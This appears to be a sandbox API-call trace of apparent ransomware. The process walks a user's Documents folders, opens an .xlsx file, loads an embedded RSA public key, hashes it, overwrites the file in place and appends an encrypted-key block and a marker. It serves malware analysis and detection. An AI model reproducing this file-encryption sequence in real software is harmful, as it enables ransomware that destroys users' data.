PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\") returned="gTnYqN V h\\" [0246.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0246.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\") returned="ZLJLwY4 p8u\\" [0246.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0246.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\") returned="Ji_heo\\" [0246.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0246.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0246.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8ff10 [0246.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0246.286] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.286] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.286] PathFindFileNameW (pszPath="") returned="" [0246.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd0) returned 0x3397bb8 [0246.286] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1c9c770, ftCreationTime.dwHighDateTime=0x1d5be0a, ftLastAccessTime.dwLowDateTime=0xfe2d3270, ftLastAccessTime.dwHighDateTime=0x1d5be00, ftLastWriteTime.dwLowDateTime=0xfe2d3270, ftLastWriteTime.dwHighDateTime=0x1d5be00, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.287] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1c9c770, ftCreationTime.dwHighDateTime=0x1d5be0a, ftLastAccessTime.dwLowDateTime=0xfe2d3270, ftLastAccessTime.dwHighDateTime=0x1d5be00, ftLastWriteTime.dwLowDateTime=0xfe2d3270, ftLastWriteTime.dwHighDateTime=0x1d5be00, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.287] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fbe3930, ftCreationTime.dwHighDateTime=0x1d5c274, ftLastAccessTime.dwLowDateTime=0x9ed5ba90, ftLastAccessTime.dwHighDateTime=0x1d5c481, ftLastWriteTime.dwLowDateTime=0x9ed5ba90, ftLastWriteTime.dwHighDateTime=0x1d5c481, nFileSizeHigh=0x0, nFileSizeLow=0x125bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aptTohPKV__r.xlsx", cAlternateFileName="APTTOH~1.XLS")) returned 1 [0246.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11e) returned 0x6affc0 [0246.288] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\aptTohPKV__r.xlsx") returned=".xlsx" [0246.288] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\aptTohPKV__r.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\d0cspe54ns\\apttohpkv__r.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.289] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=75196) returned 1 [0246.289] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.291] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x12596, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.291] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0246.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.293] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x125bc, lpOverlapped=0x0) returned 1 [0246.294] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0246.294] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.294] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.294] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0246.295] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.295] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.295] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0246.295] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.295] GetLastError () returned 0x0 [0246.295] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.295] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0246.295] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.295] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.295] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.296] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0246.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa00 [0246.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89138 | out: hHeap=0x620000) returned 1 [0246.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89150 | out: hHeap=0x620000) returned 1 [0246.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89198 | out: hHeap=0x620000) returned 1 [0246.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0246.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa00 | out: hHeap=0x620000) returned 1 [0246.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89198 [0246.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0246.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89150 [0246.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8660 [0246.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b89138 [0246.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0246.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0246.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0246.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0246.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bc90 [0246.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0246.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0246.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0246.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89150 | out: hHeap=0x620000) returned 1 [0246.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89138 | out: hHeap=0x620000) returned 1 [0246.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0246.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89198 | out: hHeap=0x620000) returned 1 [0246.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0246.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0246.297] GetCurrentThreadId () returned 0x5b4 [0246.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0246.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8ac18 [0246.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c1920 [0246.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0246.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0246.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0246.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0246.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.297] GetCurrentThreadId () returned 0x5b4 [0246.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x64dd08 [0246.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0246.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4ac0 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89198 [0246.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89138 [0246.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x33734f8 [0246.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89150 [0246.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8660 [0246.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0246.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89120 [0246.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0246.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b891b0 [0246.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0246.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0246.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89180 [0246.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89168 [0246.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b891c8 [0246.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89168 | out: hHeap=0x620000) returned 1 [0246.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89168 [0246.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89180 | out: hHeap=0x620000) returned 1 [0246.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0246.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0246.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd518 [0246.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89138 | out: hHeap=0x620000) returned 1 [0246.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89138 [0246.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0246.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89198 | out: hHeap=0x620000) returned 1 [0246.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0246.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891c8 | out: hHeap=0x620000) returned 1 [0246.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x33e3b68 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89138 | out: hHeap=0x620000) returned 1 [0246.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0246.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33a9510 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a110 | out: hHeap=0x620000) returned 1 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a9510 | out: hHeap=0x620000) returned 1 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33e3b68 | out: hHeap=0x620000) returned 1 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89168 | out: hHeap=0x620000) returned 1 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891b0 | out: hHeap=0x620000) returned 1 [0246.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89150 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89120 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89108 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ff58 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3384ae0 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bc90 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0246.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.301] WriteFile (in: hFile=0x644, lpBuffer=0x3b99d50*, nNumberOfBytesToWrite=0x125b7, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b99d50*, lpNumberOfBytesWritten=0x39afb14*=0x125b7, lpOverlapped=0x0) returned 1 [0246.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b99d50 | out: hHeap=0x620000) returned 1 [0246.302] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x125bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.302] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0246.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0246.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0246.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa00 [0246.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0246.302] WriteFile (in: hFile=0x644, lpBuffer=0x346fa00*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa00*, 